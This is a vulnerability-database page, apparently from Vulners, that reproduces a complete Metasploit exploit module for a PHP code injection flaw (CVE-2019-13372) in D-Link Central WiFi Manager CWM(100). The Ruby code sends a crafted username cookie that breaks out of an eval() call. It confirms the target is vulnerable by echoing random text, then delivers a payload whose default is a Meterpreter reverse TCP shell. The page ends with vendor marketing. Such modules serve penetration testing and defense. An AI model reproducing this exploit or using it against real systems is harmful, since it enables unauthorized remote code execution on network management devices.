Lucene search
K

D-Link Central WiFi Manager CWM(100) RCE

🗓️ 18 Aug 2020 17:41:04Reported by M3 <M3@ZionLab from DBAppSecurity>, Redouane NIBOUCHA <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 44 Views

This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100) versions below `v1.03R0100_BETA6`, which could allow code execution on the target

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
        'Description' => %q{
          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
          versions below `v1.03R0100_BETA6`. The vulnerability exists in the
          username cookie, which is passed to `eval()` without being sanitized.
          Dangerous functions are not disabled by default, which makes it possible
          to get code execution on the target.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'M3@ZionLab from DBAppSecurity', # Original discovery
          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
        ],
        'References' => [
          ['CVE', '2019-13372'],
          ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
        ],
        'Targets' => [ [ 'Automatic', {}] ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'SSL' => true,
          'RPORT' => 443
        },
        'Platform' => %w[php],
        'Arch' => [ ARCH_PHP ],
        'DisclosureDate' => '2019-07-09',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
      ]
    )
  end

  def inject_php(cmd)
    encode_char = ->(char) { "%#{char.ord.to_s(16).rjust(2, '0')}" }
    payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
      'cookie' => "username=#{payload};password="
    )
    res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil
  end

  def check
    rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
    if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    inject_php(payload.raw)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation